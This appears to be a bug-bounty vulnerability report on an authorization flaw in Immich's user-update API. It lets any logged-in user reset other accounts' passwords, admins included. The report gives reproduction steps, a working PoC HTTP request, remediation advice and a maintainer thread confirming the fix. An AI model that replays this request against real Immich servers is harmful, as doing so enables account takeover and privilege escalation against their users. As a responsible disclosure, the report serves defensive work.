Full Account Takeover via Improper Authorization in immich-app/immich

Valid

Reported on

Sep 15th 2022


Description

Immich does not verify that the caller is an admin before applying a password change to an account. The `PUT /api/user` endpoint trusts the `id` in the request body, so any authenticated user can set the password of any other account, including admin accounts. The result is full account takeover and privilege escalation to admin.

Proof of Concept

Steps to reproduce:

1. Log in to a non-admin account
2. Obtain the full user list with a GET request to `/api/user?isAll=false` (this endpoint is reachable by non-admins because the `Shared Albums` feature depends on it). Admin accounts are identifiable by the `isAdmin` flag
3. Set the password of any account with the PoC request below (adjust the `id` accordingly). This is where the authorization check is missing
4. Observe that the target account's password has been changed. This also works for admin accounts

PoC Request

```http
PUT /api/user HTTP/1.1
Host: 10.0.2.15:2283
[...]
Cookie: immich_access_token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VySWQiOiJjNWRhYTE0MC1jYTEzLTQxOGYtYjFkMy0wNzZjNTRhZTgyYTAiLCJlbWFpbCI6Im5vdGFuYWRtaW5AdGVzdC5jb20iLCJpYXQiOjE2NjMyODEzMzcsImV4cCI6MTY2Mzg4NjEzN30.fbGB6YQ04F9JFs8qY4CtLeeah4L79vAh6QlZYJTWFDU; immich_is_authenticated=true

{"id":"ed0398b5-a64a-4dd5-af58-8a372bdee6e5","password":"password","shouldChangePassword":false}
```

Impact

The impact is full takeover of any existing account by any authenticated user, including privilege escalation to admin accounts.

Occurrences

Proper authorization needs to be implemented in the user update handler: before applying a password (or any other field) to the account named by `id`, check that the current user is an admin. Changes a user makes to their own account can remain allowed, but a non-admin must never be able to modify another account.

We are processing your report and will contact the immich-app/immich team within 24 hours. 15 days ago
vautia modified the report
14 days ago
We have contacted a member of the immich-app/immich team and are waiting to hear back 13 days ago
immich-app/immich maintainer (Maintainer), 13 days ago
Thank you for the report, I and the team really appreciate it.

This issue should be fixed in https://github.com/immich-app/immich/pull/716

vautia (Researcher), 12 days ago
Glad to hear the issue is fixed @maintainer. In that case, could you please validate the report and confirm the fix?

immich-app/immich maintainer validated this vulnerability 10 days ago
vautia has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
immich-app/immich maintainer confirmed that a fix has been merged on ece94f 10 days ago
The fix bounty has been dropped
user.controller.ts#L74-L79 has been validated